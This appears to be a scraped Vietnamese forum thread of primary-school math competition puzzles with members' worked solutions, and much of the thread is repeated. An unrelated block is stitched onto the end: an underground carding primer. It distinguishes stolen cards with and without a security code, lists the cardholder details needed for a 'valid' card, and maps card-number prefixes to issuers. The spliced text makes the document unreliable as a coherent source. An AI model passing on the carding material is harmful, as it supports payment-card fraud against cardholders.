| Originally Posted by graceoflives 45/ dựa theo đề bài, ta hiểu như sau: cứ mỗi 1 giờ kim phút của A quay được 31/30 đường tròn, của B quay được 11/10 đường tròn, của C quay được 5/4 đường tròn. Ta sẽ tìm xem kim của A và B bao lâu lại gặp nhau. (11/10-31/30) = 1/15. Vậy kim phút của A và B cứ 15 giờ lại trùng nhau Tương tự ta cũng có: sau mỗi 60/13 h thì kim của A và C lại trùng nhau. giả sử lần trùng nhau tiếp theo của cả 3 kim là lần thứ x kim A trùng kim B và lần thứ y kim A trùng kim C, thế thì tg đó = 15.x=60.y/13 với x, y đều là số tự nhiên. 15.x là số tự nhiên vậy y phải chia hết cho 13. Chọn y=13 khi đó x=4 và 15.x=60(h) Vậy sau 60h thì 3 kim trên lại trùng nhau. |
Given that a, b and c are different whole numbers from 1 to 9, find the largest possible value of (a+b+c) / (abc).
//Câu này ai nhìn vô cũng biết đáp số liền đc à, giải thích mới khó nhé, đề nghị đưa ra giải thích thuyết phục (_.__")
Quote:
| Originally Posted by graceoflives thêm vào giả sử a<=b<=c, thế là xong. P=(a+b+c)/(abc)=1/(bc)+1/(ca)+1/(ab) vì có giả sử trên cho nên a>=1;b>=2;c>=3, do đó 1/(bc)<=1/6 1/(ca)<=1/3 1/(ab)<=1/2 cộng lại suy ra P<=1 đẳng thức xảy ra khi (a,b,c) = (1,2,3) hoặc các hoán vị của nó kl max P=1 khi (a,b,c) là các hoán vị của (1,2,3) |
Quote:
| Originally Posted by PhoebeC hàng chính giữa + 4 ô nằm đứng 2 bên nữa là được 3 hàng bằng nhau. 2007 / 3 = 669. Mỗi hàng dài 669 ô, lấy 669 x 2 - 2 = 1336. A = 1336  |
Quote:
| Originally Posted by willrock9999  up hộ bài giải câu 42 :X |
Quote:
| Hint: a.c = 7 b.c = 21 a.d = 2 a+b+x = c+d+x Answer: 35/3 cm. |
Quote:
| Originally Posted by ducgiang 40. 10S + 100 - S = 111...1110 (100 chữ số 1) => 9S = 111..111010(98 số 1 liên tiếp) =>S = 123456790.....1234567901234567890 (123456790 lặp lại 10 lần, cái cuối là 1234567890) Vậy tổng các chữ số của S là 37x10+45 = 415 |
Câu này hay nà ^^!
There are buses travelling to and fro between Station A and Station B. The buses leave the stations at regular interval and a bus will meet another bus coming in the opposite direction every 6 minutes.
Peter starts cycling from A towards B at the same time Jane starts cycling from B towards A.
Peter and Jane will meet a bus coming in the opposite direction every 7 and 8 minutes respectively.
After 56 minutes of cycling on the road, they meet each other.
Find the time taken by a bus to travel from A to B.
Quote:
| Originally Posted by willrock9999 update solution 39: Suppose a bus travelling from point X and another bus travelling in opposite direction from point Y meet each other in 6 min. Setting distance XY as 1 unit distance, we can find the following speed. Speed of bus: 1/12 unit/min. Relative speed of 2 buses in opposite direction: 1/6 unit/min. The bus travelling from point X and Peter travelling in opposite direction from point Y will meet each other in 7 min. Relative speed of bus and Peter in opposite direction: 1/7 unit/min. Similarly, relative speed of bus and Jane in opposite direction : 1/8 unit/min. Therefore, Peter’s speed: 1/7 – 1/12 = 5/84 unit/min. Jane’s speed: 1/8 – 1/12 = 1/24 unit/min. Relative speed of Peter and Jane: 5/84 + 1/24 = 17/168 unit/min. Distance AB: 56 . 17/168 = 17/3 units. Time taken by bus from A to B: 17/3 ÷ 1/12 = 68 min. |
38. [ done ]
Câu này giải sao trời @@
Quote:
| Originally Posted by graceoflives bài 38: đặt mẫu số của số thứ nhất là x, của số thứ hai là y có 1/x+1/y=1 suy ra y=1+1/(x-1), khai triển ra thì y=1+1/(9+1/(9+1/(9+1/9))) đem so sánh với y từ đề bài suy ra a=1, b=9 vậy a+b=10 |
Three straight lines can form a maximum of one triangle.
Four straight lines can form a maximum of two non-overlapping triangles as shown below.
Five straight lines can form a maximum of five non-overlapping triangles.
Six straight lines can form a maximum of x non-overlapping triangles.
Find the value of x.
Quote:
| Originally Posted by willrock9999 Originally Posted by vda8888 View Post http://en.wikipedia.org/wiki/Kobon_triangle_problem Xem lời giải xong điên cmnr --------------------------------------- Wow, super likeeeee Nhưng mà mình vẽ cái hình đơn giản hơn nhiều, vẽ thêm đường thẳng từ cái ngôi sao năm cánh, chứ k vẽ phức tạp như cái ông trên Wiki =.=  |
Find the missing number x in the following number sequence.
2, 9, -18, -11, x , 29, -58, -51,…
Quote:
| Originally Posted by nhatlongvu 36. [ ??? ] Find the missing number x in the following number sequence. 2, 9, -18, -11, x , 29, -58, -51,… cộng 7 rồi nhân -2. Đáp án 22 |
Given that the value of the sum 1/a + 1/b + 1/c lies between 28/29 and 1. Find the smallest possible value of a + b + c where a,b,c are whole numbers.
Quote:
| Originally Posted by o0lys0o 35. a, b, c lần lượt là 2, 3, 7 Vì a, b, c đều là whole number, nên lần lượt thử từ nhỏ đến lớn. Ta thấy là 2 và 3 là 2 số phải có, vậy chỉ tìm số thứ 3 Ta có 1/2 + 1/3 = 5/6 Theo đề bài thì: 28/29 < 5/6+1/c <1 => 23/174 <1/c< 1/6 Dễ thấy là chỉ có 1/7 thỏa mãn dữ kiện => c=7 vậy min(a+b+c)=12 |
A language school has 100 pupils in which 69% of the pupils study French, 79% study German, 89% study Japanese and 99% study English. Given that at least x % of the students study all four languages, find the value of x.
Quote:
| Originally Posted by nhatlongvu 34. [ ??? ] Giải (theo cách hiểu mình) 69 người học tiếng Pháp, 31 người không học tiếng Pháp. 79 người học tiếng Đức, tối đá 31 người không học tiếng Pháp năm trong 79 người này nên tối thiểu là có 79-31=48 người học cả Đức lẫn Pháp trong nhóm này. 89 người học tiếng Nhật, trong đó có 11 người không học Tiếng Nhật. Số người này nằm trong 48 người học Đức lẫn Pháp, nên tối thiểu sẽ có 37 người học cả 3 thứ tiếng Nhật Đức Pháp. 99 người học tiếng Anh, trong đó có 1 người không học tiếng Anh. Người này năm trong 37 người học cả 3 thứ tiếng nên ta có tối thiểu 36 người học 4 thứ tiếng. |
At a town gathering, the people gathered are given a number card from 1 onwards according to their arrival. The last digit of the last person’s card number who arrived will determine the winning number and prizes will be given. As the last digit of the last person’s card number was 7, all who had card with 7 as their last digit received prize of $500 each. However, it was discovered that one card was not distributed. The last digit of the card which was not given was 2. Then with a bigger number than the one not distributed, $300 each were given out to all with 8 as the last digit on their cards as additional prizes. As a result, 33 people received prizes and total amount of prizes was $14,100.
What was the card number of the last person who arrived?
What was the number of the card which was not given out?
Quote:
| Originally Posted by willrock9999 Đáp án câu 33 đây nhé: Call x and y are the people who had received $500 and $300 prizes respectively. 33 people received prizes: x + y = 33 Total amount of prizes was $14,100: 500x + 300y = 14100 So: x = 21 and y = 12 The last digit of the last person’s card number was 7 the card number of the last person who arrived was 207. The card number of the last person who received $300 was 198. 19 + 1 – 12 = 8 The card number of the first person who received $300 was 88. the number of the card which was not given out was 82. Các bác đỡ hộ 2 câu 34, 35 gấp gấp với :( |
32. [ ??? ]
(1,1,9) is a triple of natural numbers whose sum is 11. We consider (1,1,9), (1,9,1) and (9,1,1) to be the same triple because each triple has the same three numbers. How many other triples of natural numbers have a sum of 11?
31. [ ??? ]
TV nhé ^^!
Quote:
| I. Cho các số tự nhiên được viết theo qui luật là 100 số 1, 4, 7, 10, 13, 16, 19, 22,… và 100 số 2, 6, 10, 14, 18, 22, 26, 30,… Hỏi có bao nhiêu số trùng nhau? A. 22 B. 23 C. 24 D. 25 E. 30 II. Tìm phần dư r trong phép chia số 9999…99 (2008 chữ số 9) cho 135? A. 3 B. 4 C. 7 D. 8 E. 9 III. Tìm hai chữ số tận cùng của số M = 1! + 2! + … + 2001! A. 92 B. 93 C. 95 D. 83 E. 99 |
Câu này hơi điêu... =.=
24. [ ??? ]
26. [ ??? ]
Given that the product of four difference whole numbers is 10,000. Find the greatest possible value of the sum of the four numbers???
27. [ ??? ]
Don't use calculator, compare:
3^40
5^30
7^20
28. [ ??? ]
29. [ ??? ]
Given that 5 by 5 grid consists of 25 unit squares. Find the largest number of unit squares to be shaded so that each row, each column and each of the two main diagonal lines has at most 2 unit squares that are shaded???
Hại não với toán tiểu học nào :-ss [p1]
1. [Đã xong]
In how many ways can 7/12 be written as a sum of two fractions in lowest term given that the denominators of the two fractions are different and are each not more than 12?
đáp án ra 3
2. [ đã xong]
There are 72 students in Grade 6.
Each of them paid an equal amount of money for their mathematics text books.
The total amount collected is $ X35. 0Y , where two of the digits indicated with X,Y cannot be recognized.
How much money did each student pay for the books?
yup, u rock ^^!
3. [ cứ cho là xong đi -.- ]
câu này em ra rồi, post cho các bác làm lun
thế nào cũng có ng làm sai cho coi =]]
There are three classes A, B and C.
Class A has 2 more students than class B.
Class B has 1 more student than class C.
The product of the numbers of students in the three classes is 99360.
How many students are there in class A?
Ha ha, product là tích nhé các bác, dợt một hồi cũng có bác cứng đầu bảo là tổng
Ai còn cãi cố thì thử nghĩ coi, 3 lớp mà đến 99k hs ah
4. [done]
Three boys Abel, Ben and Chris participated in a 100 m race.
When Abel crossed the 100 m mark, Ben was at 90 m.
When Ben crossed the 100 m mark, Chris was at 90 m.
By how many metres did Abel beat Chris?
[ Note : They were running at constant speeds throughout the race.]
câu này đơn giản mà có một số bác cứ bem là 20
Ans: 19
5. [ xong ]
One pan can fry 2 pieces of meat at one time. Every piece of meat needs two minutes to be
cooked (one minute for each side). Using only one pan, find the least possible time required
to cook
(i) 2000,
(ii) 2005 pieces of meats.
Yeah, u rock ^^!
6. [ câu này khó nhưng đã xong ]
David’s father picks him up from school every evening at 6 pm. One day, David was
dismissed early at 5 pm. He walked home taking the same route that his father usually
drives. When he met his father along the way he boarded the car and returned home 50
minutes earlier than usual. Given that his father drove at a constant speed and planned to
reach the school at 6 pm sharp, how long, in minutes, had he walked before he was picked
up by his father?
=.= cao nhân đây
7. [done]
kaka
x=666
8. [ done ]
A three digit number 5ab is written 99 times as 5ab5ab5ab……..5ab. The resultant number is a multiple of 91. What is the three digit number?
=.= thế mà cũng nghĩ ra đc ah, hay thế
Note cho các bạn khác nhé: do 1001 x abc = abcabc
9. [ done ]
How many rectangles are there in the following diagram?
hiz, Tuwr tuf ko bị mắc lừa à T_T
30 đúng rồi đấy...
//hình vuông là hình chữ nhật đặc biệt nhá mấy bác bị lừa
Gợi ý cho các bạn khác nhé:
1 ô: 9 hình
2 ô: 10 hình
3 ô: 5 hình
4 ô: 4 hình
5 ô: 1 hình
6 ô: 1 hình
----------------
TC : 30 hình
10. [ done ]
The diagram shows a circular track with AB as its diameter.
Betty starts walking from point A and David starts from point B.
They walk toward each other along the circular track.
They meet at point C which is 80 m from A the first time.
Then, they meet at point D which is 60 m from B the second time.
What is the circumference of the circular track?
11. [done]
chờ cao nhân giải cho tiểu học T_T
chủ top bí cách giải cho tiểu học roài...
Ans ra 360km nhé.
A car travels from town P to town Q at a constant speed.
When it increases its speed by 20%,
the journey from P to Q takes 1 hour less than its usual time.
When it travels at its usual speed for 100 km before increasing its speed by 30%,
the journey also takes 1 hour less than usual.
Find the distance between the two towns.
12. [chắc là sai đề...]
Lại cần phải nhờ đến các bác nữa đây =.=
One hundred numbers are placed along the circumference of a circle. When any five adjacent numbers are added, the total is always 40. Find the difference between the largest and the smallest of these numbers.
T__T
Link ảnh đề với đáp án câu 12 (chắc là đề nói vịt còn giải theo gà):
13. [done]
hajz, tiểu học ơi là tiểu học...
14. [done]
Mình dị ứng số 13, nên update lun câu 14 nhé
Câu này dễ ^^!
There are three containers. One contains red marbles, another white marbles and the third one a mixture of red and white marbles. Given that all of them are labelled wrongly and you are allowed to open only one of them to take out only one marble in order to state correctly where all labels ought to go, which container should you open?
15. [done]
Chê bài 14 dễ thì mình cho bài khó đây
Given the number:
20082008...(2008)...2008623
|-----------------------|
There are n of 2008s.
Find the smallest value of n such that the number is divisble by 11.
16. [done]
Peter and Jane are to take turns to subtract perfect squares from a given whole number and the one who reachs zero first is the winner. If the whole number is 29, and Peter is the first player, what perfect number must he subtract in order for him to definitely win.
[Note: 1,4,9,16,25 are examples of perfect squares.]
17. [Bỏ qua, tại đề tự chế @@]
Bài này mình gõ tv nhé, làm biếng dịch wa tiếng anh =.=
1 1 1 1
1 1 1 1
1 1 1 1
1 0 1 1
Cho ma trận với:
1 biễu diễn cho đèn sáng.
0 biễu diễn cho đèn tắt.
Trong 1 lần chỉ có thể tắt/mở tất cả đèn của 1 hàng dọc, 1 hàng chéo hoặc 4 góc của ma trận.
Hỏi có thể chỉnh sao cho tất cả các đèn đều sáng (hoặc tất cả đều tắt) đc hay ko? Nếu đc, nêu cách chỉnh???
18. [done]
The product of n whole numbers 1 x 2 x 3 x 4 x5 x…x (n-1) x n has twenty eight consecutive zeros. Find the largest value of n.
Bài này giải thích hơi bị dài dòng >"<
Gợi ý thôi nhé:
124:5 = 24 dư 4
124:25=4 dư 24
Đáp số ra 124
19. [done]
A piece of pasture grows at a constant rate everyday. 200 sheep will eat up the grass in 100 days. 150 sheep will eat up the grass in 150 days. How many days does it take for 100 sheep to eat up the grass?
20. [done]
Cần các bác đỡ hộ 1 bài đây
Giỏi thế
2-1=1=1^1
3-2=1=1^2
4-3=1=1^3
3-1=2=2^1
7-3=4=2^2
15-7=8=2^3
4-1=3=3^1
13-4=9=3^2
40-13 =27=3^3
21. [done]
>"< Solution for question 21:
360x6 + 1x360 = 2520
22. [done]
A goat in a horizontal ground is tied to one end of 14 m long rope. The other end of the rope is attached to a ring which is free to slide along a fixed 20 m long horizontal rail.If the maximum possible area that the goat can graze is x m2, find the value of x.
[Ignore the dimension of the ring and take pi to be 22/7.]
Assume the rail is fixed and pi = 22/7
So total area includes a rectangle and a circle.
rect = 28 x 20 = 560
circle = 22/7 x 14 x 14 =616
560 + 616 = 1176
23. [done]
The 13 squares are to be filled with whole numbers. If the sum of any three adjacent number is 21, find the value of x???
|_____|_____|_____|_____|__4__|_____|_____|_____|__9__|_____|_____|_____|__x__|
25. [done]
READMORE
In how many ways can 7/12 be written as a sum of two fractions in lowest term given that the denominators of the two fractions are different and are each not more than 12?
đáp án ra 3
2. [ đã xong]
There are 72 students in Grade 6.
Each of them paid an equal amount of money for their mathematics text books.
The total amount collected is $ X35. 0Y , where two of the digits indicated with X,Y cannot be recognized.
How much money did each student pay for the books?
Quote:
Originally Posted by impetus tổng số tiền phải chia hết cho 8 --> 3 chữ số cuối chia hết cho 8 --> 50Y chia hết cho 8 --> Y = 4. tổng số tiền phải chia hết cho 9 --> tổng các chữ số chia hết cho 9 --> X = 6 |
3. [ cứ cho là xong đi -.- ]
câu này em ra rồi, post cho các bác làm lun
thế nào cũng có ng làm sai cho coi =]]
There are three classes A, B and C.
Class A has 2 more students than class B.
Class B has 1 more student than class C.
The product of the numbers of students in the three classes is 99360.
How many students are there in class A?
Ha ha, product là tích nhé các bác, dợt một hồi cũng có bác cứng đầu bảo là tổng
Ai còn cãi cố thì thử nghĩ coi, 3 lớp mà đến 99k hs ah
4. [done]
Three boys Abel, Ben and Chris participated in a 100 m race.
When Abel crossed the 100 m mark, Ben was at 90 m.
When Ben crossed the 100 m mark, Chris was at 90 m.
By how many metres did Abel beat Chris?
[ Note : They were running at constant speeds throughout the race.]
Quote:
Originally Posted by impetus đáp án là 19m gọi thằng A là 100% thì tốc độ thằng B là 90%. thằng C bằng 90% thằng B nên bằng 90% của 90% thằng A tức là bằng 81% thằng A. vậy thằng A hơn thằng C là 100-81=19 |
Ans: 19
5. [ xong ]
One pan can fry 2 pieces of meat at one time. Every piece of meat needs two minutes to be
cooked (one minute for each side). Using only one pan, find the least possible time required
to cook
(i) 2000,
(ii) 2005 pieces of meats.
Quote:
Originally Posted by Tuwr tuf (i) 2000 là số chẵn nên cứ bỏ 2 miếng một lên chiên rồi lật mặt lại chiên tiếp cho đến khi nào xong thì thôi => 2000 phút (ii) Chiên 2002 miếng như (i) mất 2002 phút, còn 3 miếng 1, 2, 3 chiên như sau: (1-2), (1-3), (2-3), mất 3 phút nữa, tổng cộng 2005 phút. |
6. [ câu này khó nhưng đã xong ]
David’s father picks him up from school every evening at 6 pm. One day, David was
dismissed early at 5 pm. He walked home taking the same route that his father usually
drives. When he met his father along the way he boarded the car and returned home 50
minutes earlier than usual. Given that his father drove at a constant speed and planned to
reach the school at 6 pm sharp, how long, in minutes, had he walked before he was picked
up by his father?
Quote:
Originally Posted by Tuwr tuf Gọi x là quãng đường thằng bé đã đi được từ trường cho đến khi gặp bố nó, a là quãng đường từ nhà đến trường. Bình thường thì thằng bố phải đi từ nhà đến trường rồi từ trường về nhà nên phải đi một quãng đường là 2a. Vì bữa nay thằng bố gặp thằng con dọc đường nên tiết kiệm được một khoảng là 2x. Mà vì tiết kiệm được một khoảng 2x nên đi về sớm hơn 50 phút => để thằng bố đi hết cái đoạn x đó hết 25 phút. Mà nếu thằng bố đi hết cái đoạn x đó thì đến trường đón lúc 6h đúng, suy ra lúc gặp giữa đường là 5h35. Vây thằng con đã đi bộ được 35 phút. // Bài này hơi nhảm vì cùng cái quãng đường x đó thằng con đi bộ hết 35 phút mà thằng bố đi xe hơi mất đến 25 phút. |
7. [done]
Quote:
 |
Quote:
 |
8. [ done ]
A three digit number 5ab is written 99 times as 5ab5ab5ab……..5ab. The resultant number is a multiple of 91. What is the three digit number?
Quote:
Originally Posted by Tuwr tuf Ra rồi, để ý là 1001 = 7 x 11 x 13 = 91 x 11, nên một số mà chia hết cho 1001 thì cũng chia hết cho 91. 5ab5ab...5ab (99 lần) = [5ab5ab(97 lần 000) + 5ab5ab(95 lần 000) + ... + 5ab5ab000] + 5ab Cái đống trong ngoặc [] chia hết cho 1001 nên chia hết cho 91, suy ra cái 5ab còn lại cuối cùng cũng phải chia hết cho 91, suy ra 5ab = 546 = 91 x 6 |
Note cho các bạn khác nhé: do 1001 x abc = abcabc
9. [ done ]
How many rectangles are there in the following diagram?
Quote:
Originally Posted by Tuwr tuf Bài này dễ mà, chỉ kiên nhẫn chút cho khỏi nhầm thôi, mắt mờ đếm được 30, không chắc |
30 đúng rồi đấy...
//hình vuông là hình chữ nhật đặc biệt nhá mấy bác bị lừa
Gợi ý cho các bạn khác nhé:
1 ô: 9 hình
2 ô: 10 hình
3 ô: 5 hình
4 ô: 4 hình
5 ô: 1 hình
6 ô: 1 hình
----------------
TC : 30 hình
10. [ done ]
The diagram shows a circular track with AB as its diameter.
Betty starts walking from point A and David starts from point B.
They walk toward each other along the circular track.
They meet at point C which is 80 m from A the first time.
Then, they meet at point D which is 60 m from B the second time.
What is the circumference of the circular track?
Quote:
Originally Posted by Mr.Mouse Giải như khakh là đúng rồi. Do 2 người đi ngược chiều nên trong thời gian từ lúc bắt đầu đi đến khi gặp tại C quãng đường 2 người đi được là cung AB là 1/2 chu vi. Trong thời gian từ lúc gặp nhau tại C đến lúc gặp tại D, quãng đường mà 2 người đi được là 1 chu vi. Do vận tốc không đổi, tổng quãng đường đi được là gấp 2 - quãng đường A đi được là gấp 2 tức là cung CBD = 2 AC=160m Nửa chu vi = cung AB = AC + CBD - BD = 80+160-60 =180m => chu vi 360m |
11. [done]
chờ cao nhân giải cho tiểu học T_T
chủ top bí cách giải cho tiểu học roài...
Ans ra 360km nhé.
A car travels from town P to town Q at a constant speed.
When it increases its speed by 20%,
the journey from P to Q takes 1 hour less than its usual time.
When it travels at its usual speed for 100 km before increasing its speed by 30%,
the journey also takes 1 hour less than usual.
Find the distance between the two towns.
Quote:
Originally Posted by Tuwr tuf Mỗi giờ nó chạy nhanh hơn một đoạn bằng 0.2 vận tốc, mà nó đến trước 1h nghĩa là chạy nhanh hơn 1 đoạn bằng 1 vận tốc, vậy có nghĩa là nó đã chạy trong 1 : 0.2 = 5h, vậy nó chạy bình thường hết 5 + 1 = 6h. Đặt đoạn PM = 100km, MQ là đoạn còn lại, xét đoạn MQ, tương tự như trên ta có: Mỗi giờ nó chạy nhanh hơn một đoạn bằng 0.3 vận tốc, mà nó đến trước 1h nghĩa là chạy nhanh hơn 1 đoạn bằng 1 vận tốc, vậy có nghĩa là nó đã chạy trong 1 : 0.3 = 3h20'. Vậy nó chạy đoạn PQ hết 1h40', vậy suy ra vận tốc của nó là 100 : 1h40' = 60km/h, quãng đường là 60 x 6 = 360km |
Quote:
Originally Posted by willrock9999 uh ha, tự dưng lâu lâu bị ngu =.= Ban đầu tính theo cũng gần giống ông nhưng theo kiểu hiệu số phần bằng nhau. Ko nghĩ đến khúc sau cũng áp dụng tương tự... TH1: Tỷ lệ về vận tốc là 120% = 6/5 Suy ra tỷ lệ về thời gian là 5/6 Hiệu số phần thời gian bằng nhau là: 6 - 5 = 1 phần tương ứng với 1h (đến sớm theo đề) Suy ra tổng thời gian chạy bình thường là 6h (tương ứng với 6 phần) TH2: Trên quãng đường còn lại: Tỷ lệ về vận tốc là 130% = 13/10 Suy ra tỷ lệ về thời gian là 10/13 Hiệu số phần thời gian bằng nhau là: 13 - 10 = 3 phần tương ứng với 1h (đến sớm theo đề) Suy ra thời gian chạy theo vận tốc đã tăng 30% là: 10/3 h = 3h20' (tương ứng với 10 phần) Thời gian chạy tổng cộng là 5h, suy ra thời gian chạy 100km đầu là 5h - 3h20' = 1h40'=5/3 h Mà trong 100km đầu tiên là vận tốc bình thường nên vận tốc sẽ là 100/(5/3)=60 km/h PQ=60x6=360 km. Thanks for ur help, Tuwr tuf ^^! |
Lại cần phải nhờ đến các bác nữa đây =.=
One hundred numbers are placed along the circumference of a circle. When any five adjacent numbers are added, the total is always 40. Find the difference between the largest and the smallest of these numbers.
T__T
Link ảnh đề với đáp án câu 12 (chắc là đề nói vịt còn giải theo gà):
13. [done]
hajz, tiểu học ơi là tiểu học...
Quote:
Originally Posted by Tuwr tuf  ODRB = 2 x OCPE => BR = 2 x PE (*) ODRB = 3 x OAQF => DR = 3 x QA => OB = 3 x OF => OBE = 9 x OFC => EB = 3 x OC => EB = 3 PE (**) Từ (*) và (**) ta có: PE = 1/6 PR => OCF = 1/36 PQR EB = 1/2 PR => OAD = 1/4 PQR = 9/36 PQR BR = 1/3 PR => OBE = 1/9 PQR = 4/36 PQR => Tổng 3 tam giác trên = 14/36 PQR => tổng phần màu xám = 22/36 PQR = 176 => PQR = 288 |
14. [done]
Mình dị ứng số 13, nên update lun câu 14 nhé
Câu này dễ ^^!
There are three containers. One contains red marbles, another white marbles and the third one a mixture of red and white marbles. Given that all of them are labelled wrongly and you are allowed to open only one of them to take out only one marble in order to state correctly where all labels ought to go, which container should you open?
Quote:
Originally Posted by Tuwr tuf Bài này dễ mà, trên mạng thấy nhiều rồi, cái kiểu bài có 3 thùng dán nhãn Táo, Cam, Táo & Cam ấy. Mở thùng có nhãn R & W, vì nó ghi sai nên bên trong không thể là R & W được, mà chỉ có thể là R hoặc W. Không mất tính tổng quát giả sử nó là R. Vậy thùng W không thể là W, cũng không thể là R => thùng W chứa R & W. Thùng còn lại là thùng R chứa W. Bài 13 không khó để đoán đáp số, chờ tí nghĩ cách vẽ đường phụ đã. Bài 12 thì cái bài giải với cái đề không khớp nhau tí nào. |
15. [done]
Chê bài 14 dễ thì mình cho bài khó đây
Given the number:
20082008...(2008)...2008623
|-----------------------|
There are n of 2008s.
Find the smallest value of n such that the number is divisble by 11.
Quote:
Originally Posted by Radeon 15. n = 3: 200820082008623 số chia hết cho 11 là số có tổng các chữ số ở vị trí lẻ trừ tổng các chữ số ở vị trí chẵn chia hết cho 11 (hoặc ngược lại, chẳn trừ lẻ). ta thấy số 2 luôn ở vị trí lẻ còn số 8 ở vị trí chẳn tổng các số ở vị trí lẻ trừ tổng các số ở vị trí chẵn là (2+0+2+0+...+2+0+6+3)-(0+8+0+8+0+8+...+0+8+2) = 2n+9 - (8n+2) = 7-6n thử với n = 1,2,3,...để 7-6n chia hết cho 11 thì đc n = 3 Quan trọng là phải biết tính chất chia hết cho 11 chứ cũng ko có gì khó |
Peter and Jane are to take turns to subtract perfect squares from a given whole number and the one who reachs zero first is the winner. If the whole number is 29, and Peter is the first player, what perfect number must he subtract in order for him to definitely win.
[Note: 1,4,9,16,25 are examples of perfect squares.]
Quote:
Originally Posted by blueknife Đáp án là bốc 9 trước Câu 16 để chiến thắng, số square còn lại sau khi peter bốc phải là tổng của 2 số chính phương (ngoại trừ 25 - vì 25 thì nó bốc mất, còn lại các trường hợp tổng 2 số CP khác : 4+1, 9+4, 4+16... đều ko là CP) vậy thì peter phải bốc sao cho số ô vuông còn lại nằm trong dãy sau 1+1=2 1+4=5 1+9=10 1+16=17 4+4=8 4+9=13 4+16=20 ************** Khi đã biết trước mình cần để lại số square nằm trong dãy trên, peter có thể chơi như sau: 1. Lượt 1 : Peter bốc 9 : còn lại 20 2. Lượt 2 : + Nếu Jane bốc 4 hoặc 16 thì phệt ngay 16 hoặc 4 tương ứng để về 0; + Nếu Jane bốc 1 thì Peter bốc 9 để thành 10, nếu Jane bốc 9 thì peter bốc 1 (cũng thành 10) 3. Lượt 3 (thực ra là 4) sau khi peter bốc lần 2 của cậu ấy, số square còn lại là 10. + nếu Jane bốc 1 --> phệt 9 còn lại + Jane bốc 9 --> phệt 1 còn lại + Jane bốc 4 --> phệt 4 --> còn lại 2 square 4. Khi lượt cuối , còn lại 2 square + Jane chỉ có thể bốc 1 --> phệt nốt 1 |
17. [Bỏ qua, tại đề tự chế @@]
Bài này mình gõ tv nhé, làm biếng dịch wa tiếng anh =.=
1 1 1 1
1 1 1 1
1 1 1 1
1 0 1 1
Cho ma trận với:
1 biễu diễn cho đèn sáng.
0 biễu diễn cho đèn tắt.
Trong 1 lần chỉ có thể tắt/mở tất cả đèn của 1 hàng dọc, 1 hàng chéo hoặc 4 góc của ma trận.
Hỏi có thể chỉnh sao cho tất cả các đèn đều sáng (hoặc tất cả đều tắt) đc hay ko? Nếu đc, nêu cách chỉnh???
18. [done]
The product of n whole numbers 1 x 2 x 3 x 4 x5 x…x (n-1) x n has twenty eight consecutive zeros. Find the largest value of n.
Bài này giải thích hơi bị dài dòng >"<
Gợi ý thôi nhé:
124:5 = 24 dư 4
124:25=4 dư 24
Đáp số ra 124
19. [done]
A piece of pasture grows at a constant rate everyday. 200 sheep will eat up the grass in 100 days. 150 sheep will eat up the grass in 150 days. How many days does it take for 100 sheep to eat up the grass?
Quote:
Originally Posted by Tuwr tuf Gọi vận tốc cỏ mọc trong 1 ngày là Vc, vận tốc ăn cỏ của một con bò trong 1 ngày là Vb (gọi là bò cho khỏi nhầm b với c), số lượng cỏ của cả cánh đồng ban đầu là S, ta có: (200.Vb - Vc) x 100 = S (150.Vb - Vc) x 150 = S Từ 2 phương trình này suy ra 2250Vb = 50Vc => Vc = 50Vb Thế vào phương trình thứ nhất ta có: (200.Vb - 50Vb) x 100 = 15000Vb = S Gọi t là số ngày 100 con bò ăn hết cỏ, ta có: (100.Vb - Vc) x t = 15000Vb => t = 300 Không biết cách giải này có phù hợp với tiểu học không nhưng sau khi chọn được cách đặt ẩn này thì mình nhẩm ra rất nhanh. Cần nói thêm là phải giả sử kể cả cỏ có bị gặm sát đất thì nó vẫn mọc tiếp được, chứ nếu bọn bò đó chơi theo kiểu gặm hết chỗ này rồi mới gặm chỗ khác thì kể cả vận tốc cỏ mọc tại mỗi điểm là không đổi, nhưng diện tích cánh đồng còn cỏ sau mỗi ngày sẽ bị giảm đi nên sẽ không áp dụng phương trình kia được. |
20. [done]
Cần các bác đỡ hộ 1 bài đây
Quote:
Originally Posted by Radeon số 13 4 - 1 = 3 13 - 4 = 9 = 3^2 40 - 13 = 27 = 3^3 |
2-1=1=1^1
3-2=1=1^2
4-3=1=1^3
3-1=2=2^1
7-3=4=2^2
15-7=8=2^3
4-1=3=3^1
13-4=9=3^2
40-13 =27=3^3
21. [done]
Quote:
Originally Posted by willrock9999 có bài cho các bác cãi nhau nữa đây // cẩn thận củi lửa nhé  |
360x6 + 1x360 = 2520
22. [done]
A goat in a horizontal ground is tied to one end of 14 m long rope. The other end of the rope is attached to a ring which is free to slide along a fixed 20 m long horizontal rail.If the maximum possible area that the goat can graze is x m2, find the value of x.
[Ignore the dimension of the ring and take pi to be 22/7.]
Assume the rail is fixed and pi = 22/7
So total area includes a rectangle and a circle.
rect = 28 x 20 = 560
circle = 22/7 x 14 x 14 =616
560 + 616 = 1176
23. [done]
The 13 squares are to be filled with whole numbers. If the sum of any three adjacent number is 21, find the value of x???
|_____|_____|_____|_____|__4__|_____|_____|_____|__9__|_____|_____|_____|__x__|
Quote:
Originally Posted by Tuwr tuf 8 4 9 8 4 9 8 4 9 8 4 9 8 |
25. [done]
Quote:
Originally Posted by ratvovan 25) Gọi cái mẩu hình thang giữa A và B là X, cạnh hình vuông là a, có A+B+X= a^2/2 Lại có w1+w3=w2 => C+X=a^2/2 => A+B=C =>B=2 |
CCV và CCN là gì
CC được chia ra làm 2 loại:
CCV và CCN
CCV là Credit Card Verify ( hoặc là CVV2, CVV, CVN cũng chính là 1)
CC dạng này thì phải có 1 mã số bảo vệ đi kèm theo khi thanh toán nên loại này rất quý và sử dụng cũng rộng rãi
CCN theo dân UG Việt Nam gọi là CC non (CC dạng này không có mã số bảo vệ)
Một cái CC hợp lệ phải bao gồm đầy đủ các yếu tố sau :
+ Name on Card hay Card holder : Họ tên chủ thẻ .
+ Billing or Mailing Address : Địa chỉ .
+ City : Thành phố .
+ State : Bang ( của US và Canada ) .
+ Zip Code ( Post code ) : Mã vùng .
+ Card number : Số thẻ .
+ Card Exp date : Ngày hết hạn của thẻ .
và có thể có vài thành phần khác như :
+ Phone number : Số phone ( 11 số ) .
+ Fax Number : Số Fax ( 11 số ) .
+ CVV2 hay CVN : cái này là mã số bảo mật in trên CCV .
* CC Number (Card Number): gồm 16 chữ số ( Riêng American Express có 15 số)
Nếu chữ số đầu tiên của dãy là :
4 –> VISA
5 –> Master Card (MC)
6 –> Discover (Dis)
3 –> American Express (AMEX)
Trong đó VISA, Master Card, Discover và American Express là loại thẻ
